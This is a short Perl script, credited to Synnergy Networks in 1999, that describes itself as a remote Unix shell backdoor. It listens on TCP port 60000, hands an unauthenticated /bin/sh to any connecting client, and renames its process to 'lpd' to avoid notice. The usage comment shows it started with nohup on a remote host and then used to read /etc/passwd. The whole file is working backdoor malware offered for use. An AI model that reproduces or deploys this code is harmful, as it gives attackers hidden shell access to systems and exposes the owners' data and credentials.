#!/usr/bin/perl # *** Synnergy Networks # * Description: # # Remote unix shell backdoor. # * Author: # # headflux (hf@synnergy.net) # Synnergy Networks (c) 1999, http://www.synnergy.net # * Usage: # remote.com$ ./nohup bindshell.pl & # remote.com$ exit # Connection closed by foreign host # localhost$ telnet remote.com 60000 # Trying 192.168.1.1... # Connected to remote.com. # Escape character is '^]'. # (user@remote.com:/home/user/) # cat /etc/passwd; etc # *** Synnergy Networks use Socket; $port = 60000; $proto = getprotobyname('tcp'); $cmd = "lpd"; $system = 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh'; $0 = $cmd; socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; listen(SERVER, SOMAXCONN) or die "listen: $!"; for(; $paddr = accept(CLIENT, SERVER); close CLIENT) { open(STDIN, ">&CLIENT"); open(STDOUT, ">&CLIENT"); open(STDERR, ">&CLIENT"); system($system); close(STDIN); close(STDOUT); close(STDERR); }